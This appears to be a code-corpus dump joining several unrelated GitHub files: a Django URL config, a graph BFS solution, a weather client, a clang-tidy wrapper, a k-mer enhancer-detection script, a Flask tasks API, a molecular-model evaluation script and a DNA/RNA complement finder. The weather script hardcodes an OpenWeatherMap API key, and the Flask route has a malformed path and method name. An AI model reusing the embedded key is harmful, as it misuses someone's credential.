name='post_detail'
),
path(
'like/<slug:slug>/',
views.PostLike.as_view(),
name='post_like'
),
path(
'<int:id>/delete-post',
views.delete_post,
name='delete_post'
),
path(
'edit/<int:post_id>',
views.edit_post,
name='edit_post'
),
]
| JodyMurray/p4-plant-blog | blog/urls.py | urls.py | py | 1,567 | python | en | code | 0 | github-code | 1 | [
{
"api_name": "django.urls.path",
"line_number": 11,
"usage_type": "call"
},
{
"api_name": "views.PostList.as_view",
"line_number": 13,
"usage_type": "call"
},
{
"api_name": "views.PostList",
"line_number": 13,
"usage_type": "attribute"
},
{
"api_name": "django.ur... |
26904261036 | from collections import deque
def bfs(graph, root):
visited = set()
queue = deque([root])
i = 0
while queue:
n = queue.popleft()
if n not in visited:
if i != 0:
visited.add(n)
queue += set(graph[n]) - set(visited)
i += 1
return visited
n = int(input())
lst = []
dic = {}
for _ in range(n):
lst.append(list(map(int, input().split())))
for i in range(n):
dic[i] = []
for j in range(n):
if lst[i][j] == 1:
a = dic[i]
a.append(j)
lst_ans = [[0]*n for _ in range(n)]
for i in range(n):
visited_current = bfs(dic, i)
for node in visited_current:
lst_ans[i][node] = 1
for i in range(n):
for j in range(n):
print(lst_ans[i][j], end=" ")
print()
# 플로이드 - 와샬을 쓰면 더 쉽다.
# 플로이드 - 와샬 쓰이는 데가 많아 보인다. | habaekk/Algorithm | boj/11403.py | 11403.py | py | 918 | python | en | code | 0 | github-code | 1 | [
{
"api_name": "collections.deque",
"line_number": 5,
"usage_type": "call"
}
] |
73042146593 | # This program returns the current weather description of a requested place.
import requests
def get_weather(city):
api_key = "6259067ceac0680e898834ae9b3e9835"
url = "http://api.openweathermap.org/data/2.5/weather?q=" \
+ city + "&appid=" + api_key + "&units=metric"
request = requests.get(url)
json = request.json()
if json.get('message') == 'city not found':
return "city not found"
description = json.get("weather")[0].get("description")
temp_min = json.get("main")["temp_min"]
temp_max = json.get("main")["temp_max"]
temp_feel = json.get("main")["feels_like"]
return {'temp_min': temp_min,
'temp_max': temp_max,
'temp_feel': temp_feel,
'description': description}
def main():
city = input("What place do you want to get the weather of?\n")
weather_dict = get_weather(city)
if weather_dict == "city not found":
print("This city is not part of the OpenWeatherMap database.")
return
min = weather_dict.get('temp_min')
max = weather_dict.get('temp_max')
feel = weather_dict.get('temp_feel')
description = weather_dict.get('description')
print("For " + city + ", today's forecast is " + description + ".")
print("The minimal temperature is:", min, "degrees Celcius.")
print("The maximal temperature is:", max, "degrees Celcius.")
if feel > max:
print("But don't worry, it feels like", feel, "degrees Celcius.")
elif feel >= min:
print("It feels like", feel, "degrees Celcius.")
else:
print("But I'm sorry, it feels like", feel, "degrees Celcius.")
main() | JadaTijssen/Portfolio | weather.py | weather.py | py | 1,652 | python | en | code | 0 | github-code | 1 | [
{
"api_name": "requests.get",
"line_number": 10,
"usage_type": "call"
}
] |
22497223453 | #!/usr/bin/env python3
import argparse
import sys
import shutil
from utils import utils
from typing import List
def parse_args(av: List[str]):
parser = argparse.ArgumentParser(description="Run / check clang-tidy on staged cpp files.")
parser.add_argument(
"--clang-tidy-executable", help="Specific clang-tidy binary to use.", action="store", required=False
)
return parser.parse_known_args(av)
def main(av: List[str]):
known_args, clang_tidy_args = parse_args(av)
project_root = utils.get_project_root()
clang_tidy_executable = known_args.clang_tidy_executable
if not clang_tidy_executable:
clang_tidy_executable = shutil.which("clang-tidy")
project_root = utils.get_project_root()
candidate_files = [
f.as_posix() for f in utils.get_staged_git_files(project_root) if f.suffix in utils.CPP_EXTENSIONS
]
cmd = [clang_tidy_executable] + clang_tidy_args + candidate_files
if len(candidate_files) > 0:
print("Running clang-tidy")
utils.run_command_and_echo_on_error(cmd)
else:
print("Skipping clang-tidy (no cpp files staged)")
if __name__ == "__main__":
main(sys.argv[1:])
| CesiumGS/cesium-omniverse | scripts/clang_tidy.py | clang_tidy.py | py | 1,188 | python | en | code | 27 | github-code | 1 | [
{
"api_name": "typing.List",
"line_number": 9,
"usage_type": "name"
},
{
"api_name": "argparse.ArgumentParser",
"line_number": 10,
"usage_type": "call"
},
{
"api_name": "typing.List",
"line_number": 18,
"usage_type": "name"
},
{
"api_name": "utils.utils.get_projec... |
14724616321 | from decimal import Decimal, getcontext
import requests
from utils.utils import get_data
from utils import config
DB_API_URL = config.DB_API_URL
async def rate(valute):
RATE_CNY = requests.get('https://www.cbr-xml-daily.ru/daily_json.js').json()
rate = RATE_CNY['Valute'][valute]['Value']/10
url = f'{DB_API_URL}settings/1/'
s = await get_data(url)
r = Decimal(rate * s['k_yuany'])
return r
async def settings(valute, cost, count):
r = await rate(valute)
url = f'{DB_API_URL}settings/1/'
s = await get_data(url)
cost = int(cost)
count = int(count)
sum = Decimal((cost*r+s['k_comis_1'])*count)
return sum
async def comission():
url = f'{DB_API_URL}settings/1/'
s = await get_data(url)
c = s['k_comis_1']
return c
| IgorOlenchuk/bot_mypoison | bot/utils/settings.py | settings.py | py | 790 | python | en | code | 1 | github-code | 1 | [
{
"api_name": "utils.config.DB_API_URL",
"line_number": 7,
"usage_type": "attribute"
},
{
"api_name": "utils.config",
"line_number": 7,
"usage_type": "name"
},
{
"api_name": "requests.get",
"line_number": 11,
"usage_type": "call"
},
{
"api_name": "utils.utils.get_... |
19416966323 | import calendar
import datetime
from math import ceil
import numpy as np
from aiogram.dispatcher import FSMContext
from aiogram.types import Message, ReplyKeyboardRemove, InlineKeyboardMarkup, \
InlineKeyboardButton, CallbackQuery
from utils.db_api.models import DBCommands
from data.config import days, months
from loader import dp, bot
db = DBCommands()
# 1-ый элемент - сообщение, 2-ой - клавиатура
async def return_kb_mes_services(message, state):
await state.update_data(
{'services_by_page': {1: {}},
'keyboards': {1: {}},
'all_result_messages': {1: {}},
'page': 1}
)
data_from_state = await state.get_data()
services = await db.all_services()
if len(services) <= 5:
choice_service_kb = InlineKeyboardMarkup(row_width=5)
res_message = ''
# current_services_dict = {}
for num, service in enumerate(services, 1):
res_message += f'{num}. {service.name} - {service.price}\n'
res_message += '\n'
data_from_state.get('services_by_page')[1].update({str(num): service.name})
# current_services_dict[str(num)] = service.name
choice_service_kb.insert(InlineKeyboardButton(f'{num}',
callback_data=f's_{num}'))
data_from_state.get('keyboards').update({1: choice_service_kb})
data_from_state.get('all_result_messages').update({1: res_message})
await state.update_data(data_from_state)
elif len(services) > 5:
data_from_state.get('services_by_page').clear()
number_of_pages = ceil(len(services) / 5)
rule_np_list = []
for i in range(number_of_pages):
if i == 0:
rule_np_list.append(5)
continue
rule_np_list.append(rule_np_list[i - 1] + 5)
services_by_pages = np.array_split(services, rule_np_list)
keyboards_inside = {}
for page_num in range(number_of_pages):
if page_num == 0:
keyboards_inside.update(
{page_num + 1: InlineKeyboardMarkup(row_width=5, inline_keyboard=[
[InlineKeyboardButton('➡️', callback_data='next_page')]]
)})
continue
if page_num == list(range(number_of_pages))[-1]:
keyboards_inside.update(
{page_num + 1: InlineKeyboardMarkup(row_width=5, inline_keyboard=[
[InlineKeyboardButton('⬅️', callback_data='pre_page')]]
)})
continue
keyboards_inside.update({page_num + 1: InlineKeyboardMarkup(row_width=5, inline_keyboard=[
[InlineKeyboardButton('⬅️', callback_data='pre_page')],
[InlineKeyboardButton('➡️', callback_data='next_page')]])})
for page_num, page in enumerate(range(number_of_pages), 1):
data_from_state.get('services_by_page').update({page_num: {}})
res_message = ''
for num, service in enumerate(list(services_by_pages)[page], 1):
service_button = InlineKeyboardButton(str(num), callback_data=f's_{num}')
data_from_state.get('services_by_page')[page_num].update({str(num): service.name})
if num == 1:
keyboards_inside[page_num].add(service_button)
res_message += f'{num}. {service.name} - {service.price}\n'
res_message += '\n'
continue
keyboards_inside[page_num].insert(service_button)
res_message += f'{num}. {service.name} - {service.price}\n'
res_message += '\n'
res_message += f'Страница {page_num} из {number_of_pages}'
data_from_state.get('all_result_messages').update({page_num: res_message})
data_from_state.get('keyboards').update(keyboards_inside)
await state.update_data(data_from_state)
await message.answer(
f"Выберите услугу:\n\n{data_from_state.get('all_result_messages')[data_from_state.get('page')]}",
reply_markup=data_from_state.get('keyboards')[data_from_state.get('page')])
# return res_message, choice_service_kb
async def date_process_enter(state, year, month, day, service=True, call=None, message=None, is_it_for_master=False,
master_id=None):
response = call.message if call else message
data = await state.get_data()
c = calendar.TextCalendar(calendar.MONDAY)
master = await db.get_master_by_id(master_id) if master_id else await db.get_master_by_id(response.chat.id)
# master = await db.get_master_by_id(response.chat.id)
all_date_logs = [log.date for log in await db.get_all_master_logs(master.master_name)]
if service:
service = await db.get_service(data.get('service'))
# current_date = datetime.datetime.now(tz_ulyanovsk)
current_date = datetime.datetime.now()
# ?
# current_date += datetime.timedelta(hours=4)
if month == current_date.month and year == current_date.year:
month = current_date.month
year = current_date.year
day = current_date.day
# print(c.formatyear(current_date.year))
print_c = c.formatmonth(year, month)
# time_service = service.time
inline_calendar = InlineKeyboardMarkup(row_width=7)
if (month != current_date.month and year == current_date.year) \
or ((month != current_date.month or month == current_date.month)
and year != current_date.year):
if service:
inline_calendar.add(InlineKeyboardButton('<', callback_data='month_previous_appointment'))
else:
if master_id:
inline_calendar.add(InlineKeyboardButton('<',
callback_data=f'month_previous_del_{master.master_name}'))
else:
inline_calendar.add(InlineKeyboardButton('<', callback_data='month_previous_checks'))
data['current_choice_month'] = month
data['current_choice_year'] = year
await state.update_data(data)
inline_calendar.insert(InlineKeyboardButton(f'{months.get(print_c.split()[0])} {print_c.split()[1]}',
callback_data=' '))
if service:
inline_calendar.insert(InlineKeyboardButton('>', callback_data='month_next_appointment'))
else:
if master_id:
inline_calendar.insert(InlineKeyboardButton('>', callback_data=f'month_next_del_{master.master_name}'))
else:
inline_calendar.insert(InlineKeyboardButton('>', callback_data='month_next_checks'))
for week_day in [item for item in print_c.split()][2:9]:
if week_day == 'Mo':
inline_calendar.add(InlineKeyboardButton(days.get(week_day), callback_data=days.get(week_day)))
continue
inline_calendar.insert(InlineKeyboardButton(days.get(week_day), callback_data=days.get(week_day)))
for day_cal in [date for date in c.itermonthdays4(year, month)]:
# Исключает дни другого месяца, прошедшие дни и выходные дни (Суббота, Воскресенье)
if day_cal[2] == 0 \
or day > day_cal[2] \
or day_cal[2] in [date[0] for date
in c.itermonthdays2(year, month)
if date[1] in [5, 6]] \
or day_cal[1] != month:
inline_calendar.insert(InlineKeyboardButton(' ', callback_data=f'wrong_date'))
continue
if is_it_for_master and str(day_cal) in all_date_logs:
inline_calendar.insert(InlineKeyboardButton(f'{day_cal[2]} +',
callback_data=f'date_{day_cal}_{master.master_name}'))
else:
if master_id:
inline_calendar.insert(InlineKeyboardButton(day_cal[2],
callback_data=f'date_{day_cal}_{master.master_name}'))
else:
inline_calendar.insert(InlineKeyboardButton(day_cal[2],
callback_data=f'date_{day_cal}'))
# inline_calendar.add(InlineKeyboardButton('Отмена записи', callback_data='cancel_appointment'))
if service:
await response.answer(f'Ваше Фамилия и Имя: "{data.get("name_client")}". '
f'\nМастер: "{data.get("name_master")}"'
f'\nУслуга: "{service.name}"', reply_markup=inline_calendar)
else:
await response.answer(f'Выберите дату.', reply_markup=inline_calendar)
def get_key(d, value):
for k, v in d.items():
if v == value:
return k
| Sanzensekai-mx/cosmetology_bot_example | utils/general_func.py | general_func.py | py | 9,053 | python | en | code | 0 | github-code | 1 | [
{
"api_name": "utils.db_api.models.DBCommands",
"line_number": 12,
"usage_type": "call"
},
{
"api_name": "aiogram.types.InlineKeyboardMarkup",
"line_number": 26,
"usage_type": "call"
},
{
"api_name": "aiogram.types.InlineKeyboardButton",
"line_number": 34,
"usage_type": "... |
33918027336 | import hydra
import logging
import pandas as pd
from sklearn.model_selection import train_test_split
from sklearn.model_selection import cross_val_score, StratifiedShuffleSplit
from sklearn import metrics
from joblib import load
from transformers import pipeline
logger = logging.getLogger(__name__)
def evaluate_HGF_zero_shot(X_test, y_test):
# Topics and id correspondances
labels_str = {'code password log new': 0,
'printer print scan attached': 1,
'ticket follow': 2}
# Get zero-shot-classfier
classifier = pipeline('zero-shot-classification')
candidate_labels = list(labels_str.keys())
# Predict topics
pipeline_pred_complete = classifier(list(X_test.values), candidate_labels, hypothesis_template="This is probably a conversation on the topic of {}")
# Convert to id for scoring
pipeline_pred_id = [labels_str[pred['labels'][0]] for pred in pipeline_pred_complete]
logger.info(f'\n{metrics.classification_report(y_test, pipeline_pred_id)}')
logger.info(f'Confusion matrix:\n{metrics.confusion_matrix(y_test, pipeline_pred_id)}')
def evaluation(model, metric, cv, X_train, X_test, y_train, y_test):
# Traditional
predicted = model.predict(X_test)
logger.debug(model.predict(X_test))
logger.debug(X_test)
logger.info(f'\n{metrics.classification_report(y_test, predicted)}')
logger.info(f'Confusion matrix:\n{metrics.confusion_matrix(y_test, predicted)}')
# dict_metrics = metrics.classification_report(y_test, predicted, output_dict=True)
# Create cross validation splits, stratified
scores = cross_val_score(model, X_train, y_train, cv=cv, scoring=metric)
logger.info(f"CV SCORES: {scores}, mean {scores.mean()} and std {scores.std()}")
# return scores.mean(), scores.std(), dict_metrics['accuracy'], dict_metrics['weighted avg']['f1-score']
@hydra.main(config_path="../../conf", config_name="config")
def main(config):
# Get data, first message and topic
df_conv = pd.read_csv(config['first_message_topic_path'])
# Split data
X_train, X_test, y_train, y_test = train_test_split(
df_conv['first_msg_user'],
df_conv['topics_id'],
test_size=0.2,
random_state=config['seed'],
stratify=df_conv['topics_id'],
)
# Create cross validation splits
cv = StratifiedShuffleSplit(n_splits=5, random_state=config['seed'])
# Load models and evaluate them
clf_base = load(config['models_folder']+config['clf_base'])
logger.info('-----Evaluating cfl_base')
evaluation(clf_base, config['score_metric'], cv, X_train, X_test, y_train, y_test)
clf_HP_search = load(config['models_folder']+config['clf_HP_search'])
logger.info('-----Evaluating cfl_base_HP_search')
evaluation(clf_HP_search, config['score_metric'], cv, X_train, X_test, y_train, y_test)
# Evaluate HugginFace zero-shot
evaluate_HGF_zero_shot(X_test, y_test)
if __name__ == "__main__":
main() | Vachonni/ChatbotWiz | src/modelling/evaluate.py | evaluate.py | py | 3,005 | python | en | code | 0 | github-code | 1 | [
{
"api_name": "logging.getLogger",
"line_number": 13,
"usage_type": "call"
},
{
"api_name": "transformers.pipeline",
"line_number": 24,
"usage_type": "call"
},
{
"api_name": "sklearn.metrics.classification_report",
"line_number": 31,
"usage_type": "call"
},
{
"api... |
32134064982 | #GET() - Is used to request data from a specified resource. when you access a websites page your
#browser makes a get request to your api. The api will return the front end that is displayed
#in the browser
#for example - get request is printing "bye world" for us in the local host port no. 8000.
#POST() - is used to send data to the server to create or update a resource.
#for example - changing the password of an account
#PUT() - put is used to send data to server to create or update a resource.
#for example - put request is used to create only one copy of the resource. like signing up for the first time
#DELETE() - is used to delete a resource.
#for example - to delete an account
from flask import Flask, jsonify, request
app = Flask(__name__)
tasks = [
{
'id' : 1,
'title' : 'Buy groceries',
'description' : 'milk, cheese, vegies, fruits',
'done' : False
},
{
'id' : 2,
'title' : 'learning python',
'description' : 'in whitehatjr',
'done' : False
}
]
@app.route("/ add-data", methods = ["POST()"])
def sample2():
if not request.json:
return jsonify({
"status" : "error",
"message" : "Please Provide The Data"
}, 400)
task={
'id': tasks[-1]['id']+ 1,
'title': request.json['title'],
'description': request.json.get('description', ""),
'done': False
}
tasks.append(task)
return jsonify({
"status": "Success!!",
"message": "The task is added successfully!"
})
@app.route("/get-data")
def get_task():
return jsonify({
"data": tasks,
})
@app.route("/")
def sample():
return("bye world")
if (__name__ == "__main__"):
app.run(debug=True, port=8000)
| manasvijain20/flask-project | app.py | app.py | py | 1,849 | python | en | code | 0 | github-code | 1 | [
{
"api_name": "flask.Flask",
"line_number": 16,
"usage_type": "call"
},
{
"api_name": "flask.request.json",
"line_number": 34,
"usage_type": "attribute"
},
{
"api_name": "flask.request",
"line_number": 34,
"usage_type": "name"
},
{
"api_name": "flask.jsonify",
... |
31128572577 | #!/usr/bin/env python
import lzma
import pickle
from Bio import SeqIO
import os
import numpy as np
import sys
import matplotlib.pyplot as plt
from sklearn.feature_extraction.text import CountVectorizer as Cvec
from itertools import product
from scipy.stats import poisson
from scipy.special import softmax
dmel_bkg = np.load('dmel_bkg.npz.npy').reshape(1, 4096)
dmel_bkg_rev = np.load('dmel_bkg_revcomp.npz.npy').reshape(1, 4096)
dvir_bkg = np.load('dvir_bkg.npz.npy').reshape(1, 4096)
dvir_bkg_rev = np.load('dvir_bkg_revcomp.npz.npy').reshape(1, 4096)
def get_kmers (seq, k = 6) :
'''
Compute kmer spectrum on DNA sequence
'''
return [seq[x:x + k].lower() for x in range (len(seq) - k + 1)]
def tokenizer(kmers, single_seq=False):
'''
Create count table for kmer spectrum
'''
table = Cvec(vocabulary = [''.join(i) for i in product('acgt', repeat = 6)])
if single_seq:
table.fit([' '.join(kmers)])
rv = table.transform([' '.join(kmers)]).toarray()
else:
table.fit(kmers)
rv = table.transform(kmers).toarray()
return rv
def compute_kmer_array(fasta_file, k = 6, window_size = 500, stride = 50, return_array = False):
'''
Compute kmer tables for fasta file
'''
file_basename = os.path.splitext(fasta_file)[0]
out_name = file_basename + '.xz'
region_keys = dict()
with lzma.open(out_name, "ab") as F:
with open(fasta_file, 'rt') as f:
seqs = SeqIO.parse(f, 'fasta')
for index, seq in enumerate(seqs):
seq_name, seq_length, seq_string = seq.id, seq.seq.__len__(), seq.seq.__str__()
region_keys[index] = (seq_name, seq_length)
rv = []
for L in range(0, seq_length, stride):
print(seq_name)
if (L + window_size < seq_length):
r = seq_string[L:L+window_size]
r = get_kmers(r, k = k)
rv.append(r)
for i in range (len(rv)):
rv [i] = ' '.join(rv[i])
x = tokenizer(rv)
if return_array:
return x
else:
pickle.dump(x, F)
id_table = open(file_basename + '.idTables', 'bw')
pickle.dump(region_keys, id_table)
id_table.close()
def calc_poisson_cdf_common(kmer_table, mu_kmer_array):
times = kmer_table.shape[0]
return np.where(kmer_table > 0, 1 - poisson.cdf(kmer_table - 1, np.tile(mu_kmer_array, (times, 1))), 1)
# return np.where(kmer_table > 0, 1 - poisson.cdf(kmer_table, np.tile(mu_kmer_array, (times, 1))), 1)
def calc_poisson_cdf_all(kmer_table, mu_kmer_array):
times = kmer_table.shape[0]
return poisson.cdf(kmer_table, np.tile(mu_kmer_array, (times, 1)))
# return poisson.cdf(kmer_table, np.tile(mu_kmer_array - 1, (times, 1)))
def test_func(id_tables = 'rregions.idTables', enhancer_dna = 'annot_Ubiquitous_enhancers_S10_hg38.fa'
, regions_pickle = 'rregions.pickle', k = 6
, dmel_bkg = None, dvir_bkg = None, dmel_bkg_rev = None):
dmel_bkg = dmel_bkg * (500 - k + 1)
dmel_bkg_rev = dmel_bkg_rev * (500 - k + 1)
dvir_bkg = dvir_bkg * (500 - k + 1)
basename = os.path.splitext(regions_pickle)[0]
out_file = basename + '.bed'
SO = open('predicted_enhancers.bed', 'at')
with open(id_tables, 'br') as F:
regions_keys = pickle.load(F)
with open(enhancer_dna, 'rt') as F:
bio_seqs = list(SeqIO.parse(F, 'fasta'))
with lzma.open(regions_pickle, 'rb') as F:
for i,j in regions_keys.items():
seq_id = j[0]
seq_length = j[1]
rv = pickle.load(F)
tmp = [seq for seq in bio_seqs if seq.id.split("_")[1] == seq_id]
start_pos = int(seq_id.split(':')[1].split('-')[0])
chrom = seq_id.split(':')[0]
for seq in tmp:
rc = seq.reverse_complement(id = True, name = True, description = True).seq.__str__()
x = seq.seq.__str__()
x = get_kmers(x, k = 6)
x = tokenizer(x, single_seq = True)
rc = get_kmers(rc, k = 6)
rc = tokenizer(rc, single_seq = True)
x_minima = np.minimum(rv, x)
rc_minima = np.minimum(rv, rc)
poisson_scores_x = calc_poisson_cdf_common(x_minima, dmel_bkg)
poisson_scores_rc = calc_poisson_cdf_common(rc_minima, dmel_bkg_rev)
# poisson_scores_region_x = calc_poisson_cdf_common(x_minima, dvir_bkg)
# poisson_scores_region_rc = calc_poisson_cdf_common(rc_minima, dvir_bkg)
# poisson_scores_region = calc_poisson_cdf_common(rv, dvir_bkg)
poisson_scores_region_x = calc_poisson_cdf_common(x_minima, dvir_bkg)
poisson_scores_region_rc = calc_poisson_cdf_common(rc_minima, dvir_bkg)
ss_x = (poisson_scores_region_x) * (poisson_scores_x)
ss_rc = (poisson_scores_region_rc) * (poisson_scores_rc)
poisson_scores_rc_all = calc_poisson_cdf_all(rc, dmel_bkg_rev)
poisson_scores_x_all = calc_poisson_cdf_all(x, dmel_bkg)
poisson_scores_rv_all = calc_poisson_cdf_all(rv, dvir_bkg)
diff_x = np.abs(poisson_scores_x_all - poisson_scores_rv_all)
diff_x = np.sum(diff_x, axis = 1)/4096
diff_rc = np.abs(poisson_scores_rc_all - poisson_scores_rv_all)
diff_rc = np.sum(diff_rc, axis = 1)/4096
out_x = np.sum(1 - ss_x, axis = 1)/4096
out_rc = np.sum(1 - ss_rc, axis = 1)/4096
score_x = out_x - (diff_x * 0.1)
score_rc = out_rc - (diff_rc * 0.1)
np.savetxt('fw_scores', score_x)
np.savetxt('rv_scores', score_rc)
# score_x = softmax(out_x - diff_x)
# score_rc = softmax(out_rc - diff_rc)
minima_x = np.nanargmax(score_x)
minima_rc = np.nanargmax(score_rc)
plt.plot(score_x)
plt.plot(score_rc, 'r--')
plt.show()
if (score_x[minima_x] >= score_rc[minima_rc]):
minima = minima_x
out_score = score_x[minima_x]
else:
minima = minima_rc
out_score = score_rc[minima_rc]
ortho_position = (chrom + '\t' + f'{start_pos + minima*50}' + '\t' + f'{start_pos + minima*50 + 500}' + '\t' + f'{out_score}')
enhancer_position = '_'.join(seq.id.split('_')[0:2])
out_write = ortho_position + '\t' + enhancer_position + '\t' f'{minima}'
SO.write(out_write + '\n')
SO.close()
if __name__ == "__main__":
compute_kmer_array(sys.argv[1])
basename = os.path.splitext(sys.argv[1])[0]
test_func(regions_pickle = basename + '.xz', id_tables = basename + '.idTables', dmel_bkg = dmel_bkg, dvir_bkg = dvir_bkg, dmel_bkg_rev=dmel_bkg_rev)
| laiker96/alfree_enhancer_detection | process_fasta_vectorization.py | process_fasta_vectorization.py | py | 7,352 | python | en | code | 0 | github-code | 1 | [
{
"api_name": "numpy.load",
"line_number": 16,
"usage_type": "call"
},
{
"api_name": "numpy.load",
"line_number": 17,
"usage_type": "call"
},
{
"api_name": "numpy.load",
"line_number": 18,
"usage_type": "call"
},
{
"api_name": "numpy.load",
"line_number": 19,
... |
44221187152 | import argparse
import logging
import pdb
import sys
import traceback
from typing import Text, Optional
import torch
from pyprojroot import here as project_root
import os
sys.path.insert(0, str(project_root()))
from context_model_pretrain import make_model
from data.fsmol_task import FSMolTaskSample
from data.multitask import get_multitask_inference_batcher
from models.abstract_torch_fsmol_model import eval_context_model
from utils.metrics import BinaryEvalMetrics
from utils.test_utils import add_eval_cli_args, eval_model, set_up_test_run
from utils.logging import prefix_log_msgs, set_up_logging
logger = logging.getLogger(__name__)
"""
"""
def parse_command_line():
parser = argparse.ArgumentParser(
description="Test finetuning a GNN Multitask model on tasks.",
formatter_class=argparse.ArgumentDefaultsHelpFormatter,
)
parser.add_argument("--metric", default='None')
parser.add_argument("--model_size", default='base')
parser.add_argument(
"--dropout",
type=float,
default=0.0,
help="Dropout for molecular Transformer.",
)
parser.add_argument(
"--attention_dropout",
type=float,
default=0.0,
help="Attention Dropout for molecular Transformer.",
)
parser.add_argument(
"TRAINED_MODEL",
type=str,
help="File to load model from (determines model architecture).",
)
add_eval_cli_args(parser)
parser.add_argument(
"--batch_size",
type=int,
default=128,
help="Number of molecules per batch.",
)
parser.add_argument(
"--use-fresh-param-init",
action="store_true",
help="Do not use trained weights, but start from a fresh, random initialisation.",
)
parser.add_argument(
"--learning-rate",
type=float,
default=0.00005,
help="Learning rate for shared model components.",
)
parser.add_argument(
"--task-specific-lr",
type=float,
default=0.0001,
help="Learning rate for shared model components.",
)
parser.add_argument("--model_type", default='MoleculeTransformer')
parser.add_argument("--model_path", default='v2_mlcm/m1/best_model.pt')
parser.add_argument("--use_embedding", type=bool, default=False)
parser.add_argument("--cuda", type=int, default=5)
return parser.parse_args()
def main():
args = parse_command_line()
out_dir, dataset = set_up_test_run("Multitask", args, torch=True)
# Recreate the outdir.
# out_dir = os.path.join(args.save_dir, f'{args.model_path.split("/")[2]}_{args.train_sizes[0]}')
# os.makedirs(out_dir, exist_ok=True)
# overwrite outdir to be the model dir: save-dir is now irrelevant.
out_dir = '/'.join(args.model_path.split('/')[:-1])
set_up_logging(os.path.join(out_dir, f"eval_run.log"))
device = torch.device(f"cuda:{args.cuda}" if torch.cuda.is_available() else "cpu")
# model = make_model('base', args.model_type, device=device)
model = make_model(args, model_size=args.model_size, model_type=args.model_type, device=device)
# model.load_state_dict(torch.load(
# '/lfs/local/0/fifty/context_modeling/v3/ContextTransformer_v3_base_5e-05_0.0_0.0_100_256_ContextTransformer_v3_2023-04-20_13-51-50/best_model.pt'))
# model.load_state_dict(torch.load(
# '/lfs/local/0/fifty/context_modeling/v2_full_dim/ContextTransformer_v2_base_5e-05_0.0_0.0_100_256_ContextTransformer_v2_2023-04-22_17-45-08/best_model.pt'))
model.load_state_dict(torch.load(args.model_path, map_location=device))
embedding_model = lambda x: x.node_features # pass through or something.
model.to(device)
def test_model_fn(
task_sample: FSMolTaskSample, temp_out_folder: str, seed: int
) -> BinaryEvalMetrics:
return eval_context_model(
model=model,
embedding_model=embedding_model,
task_sample=task_sample,
batcher=get_multitask_inference_batcher(max_num_graphs=args.batch_size, device=device),
learning_rate=args.learning_rate,
task_specific_learning_rate=args.task_specific_lr,
metric_to_use="avg_precision",
seed=seed,
quiet=True,
device=device,
)
eval_model(
test_model_fn=test_model_fn,
dataset=dataset,
train_set_sample_sizes=args.train_sizes,
out_dir=out_dir,
num_samples=args.num_runs,
valid_size_or_ratio=0.,
seed=args.seed,
)
if __name__ == "__main__":
try:
main()
except Exception:
_, value, tb = sys.exc_info()
traceback.print_exc()
pdb.post_mortem(tb)
| cfifty/CAMP | context_modeling_test.py | context_modeling_test.py | py | 4,420 | python | en | code | 0 | github-code | 1 | [
{
"api_name": "sys.path.insert",
"line_number": 12,
"usage_type": "call"
},
{
"api_name": "sys.path",
"line_number": 12,
"usage_type": "attribute"
},
{
"api_name": "pyprojroot.here",
"line_number": 12,
"usage_type": "call"
},
{
"api_name": "logging.getLogger",
... |
21521159472 | #!/usr/bin/env python3
import argparse
"""
Script to find complementary subsequences inside of a main sequence.
Copyright 2020 Margherita Maria Ferrari.
This file is part of ComplSeqUtils.
ComplSeqUtils is free software: you can redistribute it and/or modify
it under the terms of the GNU General Public License as published by
the Free Software Foundation, either version 3 of the License, or
(at your option) any later version.
ComplSeqUtils is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
GNU General Public License for more details.
You should have received a copy of the GNU General Public License
along with ComplSeqUtils. If not, see <http://www.gnu.org/licenses/>.
"""
class ComplSeqUtils:
MAPPING_DNA = {'A': ('T',),
'T': ('A',),
'C': ('G',),
'G': ('C',)
}
MAPPING_RNA = {'A': ('U',),
'U': ('A', 'G'),
'C': ('G',),
'G': ('C', 'U')
}
SEQ_TYPE_MAPPING = {'dna': MAPPING_DNA, 'rna': MAPPING_RNA}
@classmethod
def __get_complementary_sequence(cls, sequence, seq_type='rna'):
ret = list()
mapping = cls.SEQ_TYPE_MAPPING.get(seq_type.lower(), dict())
for c in sequence[::-1]:
if c.upper() not in mapping.keys():
raise AssertionError('Unknown char or mapping not found for "' + c.upper() + '"')
compl = mapping.get(c.upper(), list)
if len(compl) > 0:
if len(ret) == 0:
for i in compl:
ret.append(i)
else:
for i in range(len(ret)):
tmp = ret[i]
ret[i] += compl[0]
for j in range(1, len(compl)):
ret.append(tmp + compl[j])
return ret
@classmethod
def __find(cls, sequence, complementary, num_chars):
ret = list()
for start in range(0, len(sequence) - num_chars + 1):
end = start + num_chars
if complementary == sequence[start:end]:
ret.append(str(start + 1) + '-' + str(end))
return ret
@classmethod
def get_args(cls):
parser = argparse.ArgumentParser(description='Complementary sequences utils')
parser.add_argument('-i', '--input-file', metavar='IN_FILE', type=str, required=True, help='Input file')
parser.add_argument('-o', '--output-file', metavar='OUT_FILE', type=str, required=False, help='Output file',
default='output.txt')
parser.add_argument('-n', '--num-chars', metavar='N', type=int, required=True,
help='Number of characters in subsequence')
parser.add_argument('-t', '--seq-type', type=str, required=True, choices=('dna', 'rna'), default='rna',
help='Sequence type')
return parser.parse_args()
@classmethod
def find_complementary_sequences(cls, num_chars=0, input_file=None, seq_type='rna', output_file='out.txt'):
if not input_file or not output_file or num_chars <= 0:
raise AssertionError('You must specify input file, output file and the character number')
with open(input_file, 'r') as fin:
sequence = fin.readline().strip().upper()
complementary_sequences = dict()
for start in range(0, len(sequence) - num_chars + 1):
end = start + num_chars
subsequence = sequence[start:end]
if subsequence in complementary_sequences.keys():
complementary_sequences.get(subsequence, dict())['positions'] = \
complementary_sequences.get(subsequence, dict()).get('positions', '') + ', ' + str(start + 1) + \
'-' + str(end)
continue
complementary = cls.__get_complementary_sequence(subsequence, seq_type)
for c in complementary:
res = cls.__find(sequence, c, num_chars)
if len(res) > 0:
results = ''
for i in res:
results += i + ', '
results = results[:len(results) - 2]
if complementary_sequences.get(subsequence, None) is None:
complementary_sequences[subsequence] = {'positions': str(start + 1) + '-' + str(end),
'set': ', '.join(map(str, complementary)),
'items': [{'complementary': c,
'num_results': len(res),
'results': res,
'locations': results
}]
}
else:
complementary_sequences[subsequence]['items'].append({'complementary': c,
'num_results': len(res),
'results': res,
'locations': results
})
with open(output_file, 'w') as fout:
fout.write('Sequence: ' + sequence + '\n')
fout.write('Subsequence Length: ' + str(num_chars) + '\n')
for k, v in complementary_sequences.items():
